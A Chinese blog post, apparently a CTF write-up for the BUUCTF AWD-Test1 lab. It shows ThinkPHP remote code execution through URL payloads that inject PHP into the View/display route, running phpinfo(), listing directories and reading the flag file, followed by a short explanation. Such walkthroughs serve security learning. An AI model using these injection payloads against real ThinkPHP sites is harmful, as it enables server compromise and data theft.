热门标签
热门文章
- 1Linux下Samba服务器的搭建_linux搭建samba
- 210个爆火的AI文本工具,轻松写出高质量文案
- 3openvpn搭建
- 4代理服务器可能有问题,或地址不正确(已解决)_代理服务器有问题或者地址有误
- 5【UTMB】My UTMB Account 注册步骤 | UTMB注册个人账户
- 6Win Server下超详细安装和配置DNS_windows server明细dns
- 7gnu octave和matlab,MATLAB - GNU Octave
- 8Android中解决Json字符串或Json数组的转义问题_android 向后端传json字符串
- 9C++ 迭代器iterator_c++iterator
- 10自然语言处理之语言模型LM的概念以及应用场景
当前位置: article > 正文
BUUCTF AWD-Test1
作者:小丑西瓜9 | 2024-03-04 16:32:18
赞
踩
BUUCTF AWD-Test1
打开靶场是这个有些简陋的界面。
随便点点,找到这个东西。
看到ThinkPHP,思路瞬间清晰,老熟人了。这个就是ThinkPHP漏洞。根据版本我们去找一下poc。
/index.php/?s=Index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
成功打开phpinfo界面。
查看目录
/index.php/?s=Index/\think\View/display&content="<?><?php%20system(%27ls%20/../%27);?>&data=1
找到flag了,抓取。
/index.php/?s=Index/\think\View/display&content="<?><?php%20system(%27cat%20/../flag%27);?>&data=1
防止有些新朋友不明白POC怎么来的,简短介绍一下。
这poc的意思是在URL中发送了一个参数 s。Index/\think\View/display在ThinkPHP框架中,这会被解释为对视图进行显示的操作。content是包含php代码的字符串,其中是执行的恶意代码。
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小丑西瓜9/article/detail/188051
推荐阅读
相关标签
